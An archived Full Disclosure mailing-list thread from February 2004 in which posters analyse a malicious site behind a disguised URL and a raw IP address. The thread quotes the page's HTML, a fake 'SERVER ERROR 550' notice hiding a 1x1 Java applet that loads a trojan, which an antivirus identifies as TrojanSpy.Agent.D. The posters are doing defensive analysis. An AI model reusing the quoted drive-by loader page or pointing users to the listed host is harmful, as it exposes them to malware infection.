Full Disclosure mailing list archives

RE: http://federalpolice.com:article872@1075686747

From: "Remko Lodder" <remko () elvandar org>
Date: Mon, 16 Feb 2004 01:14:27 +0100

Hi,

Just wanted to reply on this

my Mailscanner reported this:
Our content checker found
    virus: TrojanSpy.Agent.D
in an email to you from:

stating this from the message Nicola send.

I think that could give some more info.

Anyways. My AV scanner is ClamAV.

Cheers.
--

Kind regards,

Remko Lodder
Elvandar.org/DSINet.org
www.mostly-harmless.nl Dutch community for helping newcomers on the
hackerscene

mrtg.grunn.org Dutch mirror of MRTG

-----Oorspronkelijk bericht-----
Van: full-disclosure-bounces () lists elvandar org
[mailto:full-disclosure-bounces () lists elvandar org]Namens Erik van
Straten
Verzonden: zondag 15 februari 2004 23:40
Aan: Nicola Fankhauser
CC: full-disclosure () lists netsys com
Onderwerp: Re: [Full-Disclosure]
http://federalpolice.com:article872@1075686747


Hi Nicola,

It's not a zip file, not an applet, but a plain EXE file. Seems
compressed somehow, no time to figure it out now. Dunno why Mozilla
runs this (I don't like it).

If something showed up in your status bar, you should definitely assume
your box was compromised.

Take care out there,
Erik

On Sun, 15 Feb 2004 20:20:11 +0100 Nicola Fankhauser wrote:

hi jedi

On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote:

  This is equivalent to http://64.29.173.91/


ok, and the html of the index page is as following:

<html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1

HEIGHT=1></applet></body></html>


now, the "SERVER ERROR 550" is clearly a fake - the java applet below
just starts fine. strangely, the 'javautil.zip' is not a valid zip-file,
yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :)
happily start the applet without any hickups or exceptions and mozilla
states 'Applet BlackBox started' in the status bar.

is there anybody knowledgable interested in un-zipping, de-compiling and
analysing this surely malicious applet? I would like to know what
mozilla just executed on my behalf there... :(

FYI, the file 'javautil.zip' attached is directly taken from the site
mentioned above.

regards
nicola


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-disclosure mailing list
Full-disclosure () lists elvandar org
http://lists.elvandar.org/mailman/listinfo/full-disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 15)
- RE: Re: http://federalpolice.com:article872@1075686747 Aditya, ALD [Aditya Lalit Deshmukh] (Feb 16)
- <Possible follow-ups>
- RE: http://federalpolice.com:article872@1075686747 Remko Lodder (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 first last (Feb 15)
- RE:http://federalpolice.com:article872@1075686747 Tom Koehler (Feb 16)
- Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 16)
  - Re: http://federalpolice.com:article872@1075686747 madsaxon (Feb 16)
- RE: Re: http://federalpolice.com:article872@1075686747 Nick Jacobsen (Feb 16)